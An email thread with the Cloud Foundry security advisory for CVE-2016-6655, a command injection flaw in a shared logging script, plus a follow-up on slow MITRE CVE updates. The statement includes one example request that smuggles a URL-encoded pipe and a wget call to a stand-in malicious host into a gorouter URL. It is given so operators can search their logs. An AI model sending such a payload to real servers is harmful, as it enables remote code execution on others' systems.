The answer is that it varies. I can tell you that we have followed the
steps we need to do to get it into the database, it just takes time
depending on how fast MITRE makes the updates. It is not an automatic
process. Let me know if you have any other questions.
CFF Security Team
On Fri, Oct 21, 2016 at 2:46 AM, Hector Rivas Gandara <
Thank you for reporting this.
I observed that the CVE in mitre.org did not get updated:
How long does it take to get it updated?
On 17 October 2016 at 20:34, Molly Crowther <mcrowther(a)cloudfoundry.org>
Hello all - many people were asking for more information, so we have
prepared the following statement regarding CVE-2016-6655:
CFF Security Team
This issue was discovered by the IBM BlueMix team and was responsibly
reported to the Cloud Foundry Foundation.
A common script shared by many Cloud Foundry components includes some
code responsible for prepending timestamps to component logs. This code is
vulnerable to command injection in any component that logs user-provided
data. Critically it is possible for an attacker to craft a request to
gorouter that can execute arbitrary code as the VCAP user on the gorouter
VM. Gorouter logs should be examined for examples of shell-escape sequences
if operators suspect that their system may have been compromised. An
example woud be to url-encode a pipe (“|”) character followed by a
malicious command as in: https://gorouter.your-cf.com/%7Cwget%20
http://something.malicious). Note that this is only one of a number of
ways which an attacker could invoke an arbitrary command via this
Fixes were made to every CF component where this utility script is run.
Some components include this script but do not run it. Future updates will
remove the final unused instances of the vulnerable code to prevent
Operators are strongly encouraged to upgrade to CF 245 or later and use
the most recent version of any standalone CF components.
For the original public notice regarding CVE-2016-6655, please see:
On Mon, Oct 17, 2016 at 8:34 AM, Travis McPeak <tmcpeak(a)cloudfoundry.org>
CVE 2016-6655: Utility script command injectionSeverity
Cloud Foundry Foundation
Cloud Foundry release versions prior to v245
cf-mysql-release versions prior to v31
A command injection vulnerability was discovered in a common script used
by many Cloud Foundry components. A malicious user may exploit numerous
vectors to execute arbitrary commands on servers running Cloud Foundry.
OSS users are strongly encouraged to follow one of the mitigations
Upgrade to Cloud Foundry v245  or later
Upgrade to cf-mysql-release v31  or later
This issue was discovered by IBM BlueMix.
Hector Rivas | GDS / Multi-Cloud PaaS